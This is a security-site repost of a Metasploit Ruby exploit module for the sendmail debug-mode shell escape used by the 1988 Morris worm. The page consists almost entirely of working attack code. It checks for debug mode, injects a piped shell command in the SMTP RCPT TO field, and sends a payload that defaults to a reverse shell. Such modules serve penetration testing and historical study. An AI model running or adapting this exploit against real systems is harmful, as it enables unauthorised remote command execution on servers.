首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Morris Worm sendmail Debug Mode Shell Escape
来源:metasploit.com 作者:wvu 发布时间:2018-11-06  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Remote

  # cmd/unix/reverse spams the session with Telnet codes on EOF
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Morris Worm sendmail Debug Mode Shell Escape',
      'Description'    => %q{
        This module exploits sendmail's well-known historical debug mode to
        escape to a shell and execute commands in the SMTP RCPT TO command.

        This vulnerability was exploited by the Morris worm in 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

        Currently only cmd/unix/reverse and cmd/unix/generic are supported.
      },
      'Author'         => [
        'Robert Tappan Morris', # Exploit and worm for sure
        'Cliff Stoll',          # The Cuckoo's Egg inspiration
        'wvu'                   # Module and additional research
      ],
      'References'     => [
        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
      ],
      'DisclosureDate' => 'Nov 2 1988',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false, # DefUid in src/conf.c, usually "daemon"
      'Payload'        => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
      'Targets'        => [
        # https://en.wikipedia.org/wiki/Source_Code_Control_System
        ['@(#)version.c       5.51 (Berkeley) 5/2/86', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
    ))

    register_options([Opt::RPORT(25)])

    register_advanced_options([
      OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
    ])
  end

  def check
    checkcode = CheckCode::Safe

    connect
    res = sock.get_once

    return CheckCode::Unknown unless res

    if res =~ /^220.*Sendmail/
      checkcode = CheckCode::Detected
    end

    sock.put("DEBUG\r\n")
    res = sock.get_once

    return checkcode unless res

    if res.start_with?('200 Debug set')
      checkcode = CheckCode::Appears
    end

    checkcode
  rescue Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    # We don't care who the user is, so randomize it
    from = rand_text_alphanumeric(8..42)

    # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
    to = %("| sed '1,/^$/d' | sh; exit 0")

    # We don't have $PATH, so set one
    path = '/bin:/usr/bin:/usr/ucb:/etc'

    sploit = {
      nil                   => /220.*Sendmail/,
      'DEBUG'               => /200 Debug set/,
      "MAIL FROM:<#{from}>" => /250.*Sender ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail/,
      # Indent PATH= so it's not interpreted as part of the mail header
      " PATH=#{path}"       => nil,
      'export PATH'         => nil,
      payload.encoded       => nil,
      '.'                   => /250 Ok/,
      'QUIT'                => /221.*closing connection/
    }

    print_status('Connecting to sendmail')
    connect

    print_status('Enabling debug mode and sending exploit')
    sploit.each do |line, pattern|
      Timeout.timeout(datastore['SendExpectTimeout']) do
        if line
          print_status("Sending: #{line}")
          sock.put("#{line}\r\n")
        end
        if pattern
          vprint_status("Expecting: #{pattern.inspect}")
          sock.expect(pattern) do |pat|
            return unless pat
            vprint_good("Received: #{pat.first}")
          end
        end
      end
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error
    fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
  ensure
    disconnect
  end

  def on_new_session(session)
    print_warning("Do NOT type `exit', or else you may lose further shells!")
    print_warning('Hit ^C to abort the session instead, please and thank you')
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·blueimp jQuery Arbitrary File
·Blue Server 1.1 Denial Of Serv
·Morris Worm fingerd Stack Buff
·PCManFTPD 2.0.7 Server APPE Co
·LiquidVPN 1.36 / 1.37 - Privil
·Softros LAN Messenger 9.2 - De
·PHP Proxy 3.0.3 - Local File I
·Microsoft Internet Explorer 11
·Virgin Media Hub 3.0 Router -
·Advantech WebAccess SCADA 8.3.
·Royal TS/X Information Disclos
·Zint Barcode Generator 2.6 - D
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved